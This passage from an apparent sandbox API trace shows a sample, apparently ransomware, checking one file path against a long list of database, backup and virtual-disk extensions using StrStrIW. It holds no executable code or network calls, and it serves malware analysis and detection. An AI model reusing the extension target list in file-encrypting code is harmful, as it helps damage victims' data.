lpSrch=".accde") returned 0x0 [0151.064] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdr") returned 0x0 [0151.064] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdt") returned 0x0 [0151.064] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accft") returned 0x0 [0151.064] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adb") returned 0x0 [0151.064] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ade") returned 0x0 [0151.064] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adf") returned 0x0 [0151.064] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adp") returned 0x0 [0151.064] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".arc") returned 0x0 [0151.064] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ora") returned 0x0 [0151.064] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".alf") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ask") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".btr") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bdf") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cat") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cdb") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ckp") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cma") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cpd") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dacpac") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dad") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dadiagrams") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".daschema") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-shm") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-wal") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db3") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbc") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbf") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbs") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbt") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbv") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbx") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcb") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dct") returned 0x0 [0151.065] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcx") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ddl") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dlis") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dp1") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dqy") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsk") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsn") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dtsx") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dxl") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".eco") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ecx") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".edb") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".epim") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".exb") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fcd") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fdb") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fic") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp12") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmpsl") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fol") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp3") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp4") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp5") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp7") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fpt") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".frm") returned 0x0 [0151.066] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gdb") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".grdb") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gwi") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hdb") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".his") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ib") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".idb") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ihx") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itdb") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itw") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jet") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jtx") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexi") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexic") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexis") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lgc") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lwx") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maf") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maq") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mar") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mas") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mav") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdb") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdf") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mpd") returned 0x0 [0151.067] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mrg") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mud") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mwb") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".myd") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ndf") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nnt") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nrmlib") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns2") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns3") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns4") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nsf") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv2") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nwdb") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nyf") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".odb") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".oqy") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".orx") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".owc") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p96") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p97") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pan") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdb") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdm") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pnz") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qry") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qvd") returned 0x0 [0151.068] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rbf") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rctd") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rod") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rodx") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rpd") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rsd") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sas7bdat") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sbf") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".scx") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdb") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdc") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdf") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sis") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".spq") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sql") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite3") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlitedb") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".te") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".temx") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tmd") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tps") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trc") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trm") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udb") returned 0x0 [0151.069] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udl") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".usr") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".v12") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vis") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vpd") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vvv") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wdb") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wmdb") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wrk") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xdb") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xld") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xmlff") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abcddb") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abs") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abx") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdw") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adn") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db2") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fm5") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hjt") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icg") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icr") returned 0x0 [0151.070] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lut") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maw") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdn") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdt") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vdi") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhd") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmdk") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pvm") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmem") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsn") returned 0x0 [0151.071] StrStrIW (lpFirst="C:\\MSOCache\\All 